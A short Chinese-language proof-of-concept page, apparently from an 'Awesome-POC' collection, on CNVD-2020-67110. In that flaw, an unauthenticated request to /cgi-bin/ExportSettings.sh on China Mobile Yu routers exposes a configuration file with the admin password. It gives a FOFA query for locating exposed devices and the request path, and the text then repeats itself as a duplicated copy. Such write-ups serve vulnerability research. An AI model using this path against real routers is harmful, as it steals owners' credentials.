Awesome-POC/network-device/中国移动禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110.md

# 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110

## 漏洞描述

中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞，攻击者通过漏洞获取配置文件，其中包含账号密码等敏感信息

## 漏洞影响

```
中国移动 禹路由
```

## FOFA

```
title="互联世界 物联未来-登录"
```

## 漏洞复现

登录页面如下

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254794.png)

访问Url

```plain
/cgi-bin/ExportSettings.sh
```

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254659.png)

其中password为登录后台密码
update gitbook 2022-02-20 16:14:31 +08:00			`# 中国移动禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110`

			`## 漏洞描述`

			`中国移动禹路由 ExportSettings.sh 存在敏感信息泄露漏洞，攻击者通过漏洞获取配置文件，其中包含账号密码等敏感信息`

			`## 漏洞影响`

			```
			`中国移动禹路由`
			```

			`## FOFA`

			```
			`title="互联世界物联未来-登录"`
			```

			`## 漏洞复现`

			`登录页面如下`

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254794.png)`

			`访问Url`

			```plain
			`/cgi-bin/ExportSettings.sh`
			```

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254659.png)`

			`其中password为登录后台密码`